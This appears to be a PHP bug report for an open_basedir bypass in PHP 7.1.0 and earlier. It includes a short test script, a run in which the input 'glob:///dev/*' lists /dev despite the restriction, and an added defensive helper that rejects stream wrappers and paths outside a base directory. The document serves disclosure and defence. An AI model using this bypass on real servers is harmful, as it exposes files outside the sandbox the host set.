PHP 7.1.0 and prior open_basedir bypass through glob wrapper
# ./php -v
PHP 7.1.0 (cli) (built: Dec 23 2016 16:08:30) ( NTS DEBUG )
Copyright (c) 1997-2016 The PHP Group
Zend Engine v3.1.0-dev, Copyright (c) 1998-2016 Zend Technologies

Test script:
---------------
<?php
if ($dh = opendir($argv[1])) {
    while (($file = readdir($dh)) !== false) {
        echo "$file ";
    }
    closedir($dh);
}

Expected result:
----------------
Warning: opendir(): open_basedir restriction in effect. File(/dev/) is not within the allowed path(s): (/virtual/) in /virtual/php/71/bin/bypass.php on line 2
Warning: opendir(/dev/): failed to open dir: Operation not permitted in /virtual/php/71/bin/bypass.php on line 2

Actual result:
--------------
# ./php bypass.php "/dev/"
Warning: opendir(): open_basedir restriction in effect. File(/dev/) is not within the allowed path(s): (/virtual/) in /virtual/php/71/bin/bypass.php on line 2
Warning: opendir(/dev/): failed to open dir: Operation not permitted in /virtual/php/71/bin/bypass.php on line 2

# ./php bypass.php "glob:///dev/*"
MAKEDEV apm apmctl arandom audio audio0 audio1
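
An application-side check for the pattern in the test script above, where a caller-supplied string reaches opendir() unchanged. This is an added example, not code from the original report; safe_list_dir() and the scratch base directory are hypothetical names, and the check complements open_basedir rather than relying on it.

```php
<?php
declare(strict_types=1);

// Added example, not code from the original report.
// safe_list_dir() is a hypothetical helper; $base is an assumed allow-listed root.

/** List a directory only if it is a plain filesystem path inside $base. */
function safe_list_dir(string $path, string $base): array
{
    // Refuse anything that names a stream wrapper (glob://, phar://, ...),
    // so the wrapper code path from the report is never reached.
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $path) === 1) {
        throw new InvalidArgumentException('stream wrappers are not accepted');
    }

    // Canonicalise both sides; realpath() resolves "..", symlinks and
    // returns false for anything that is not an existing filesystem path.
    $realBase = realpath($base);
    $realPath = realpath($path);
    if ($realBase === false || $realPath === false || !is_dir($realPath)) {
        throw new InvalidArgumentException('not an existing directory');
    }

    // Compare with a trailing separator so /virtual2 does not match /virtual.
    $sep = DIRECTORY_SEPARATOR;
    $realBase = rtrim($realBase, $sep) . $sep;
    if (strncmp($realPath . $sep, $realBase, strlen($realBase)) !== 0) {
        throw new InvalidArgumentException('path is outside the allowed base');
    }

    $entries = scandir($realPath);
    if ($entries === false) {
        throw new RuntimeException('directory could not be read');
    }
    return array_values(array_diff($entries, ['.', '..']));
}

// Constructed demo input: a scratch base directory and three candidate paths.
$base = sys_get_temp_dir() . '/basedir_demo_' . getmypid();
mkdir($base . '/sub', 0700, true);
touch($base . '/sub/a.txt');
foreach ([$base . '/sub', 'glob:///dev/*', $base . '/sub/../..'] as $input) {
    try {
        echo $input, ' => ', implode(' ', safe_list_dir($input, $base)), "\n";
    } catch (InvalidArgumentException $e) {
        echo $input, ' => rejected: ', $e->getMessage(), "\n";
    }
}
unlink($base . '/sub/a.txt'); rmdir($base . '/sub'); rmdir($base);
```

Only the first input is listed; the glob:// string is rejected before any directory function is called, and the traversal path is rejected after canonicalisation.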